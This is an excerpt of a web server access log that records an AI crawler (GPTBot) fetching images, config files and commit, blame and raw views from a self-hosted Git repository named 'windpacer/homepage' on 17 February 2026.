+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" -[17/Feb/2026:14:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" -[17/Feb/2026:14:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11235] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" -[17/Feb/2026:14:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11235] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" -[17/Feb/2026:14:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" -[17/Feb/2026:14:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" -[17/Feb/2026:14:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" -[17/Feb/2026:14:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" -[17/Feb/2026:14:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" -[17/Feb/2026:14:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" -[17/Feb/2026:14:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641823] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" -[17/Feb/2026:14:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" -[17/Feb/2026:14:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" -[17/Feb/2026:14:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" -[17/Feb/2026:14:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" -[17/Feb/2026:14:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498864] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508487] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429965] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692379] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" -[17/Feb/2026:14:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" -[17/Feb/2026:14:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508489] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692380] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429967] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641825] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498871] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699422] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" -[17/Feb/2026:14:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" -[17/Feb/2026:14:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" -[17/Feb/2026:14:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" -[17/Feb/2026:14:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 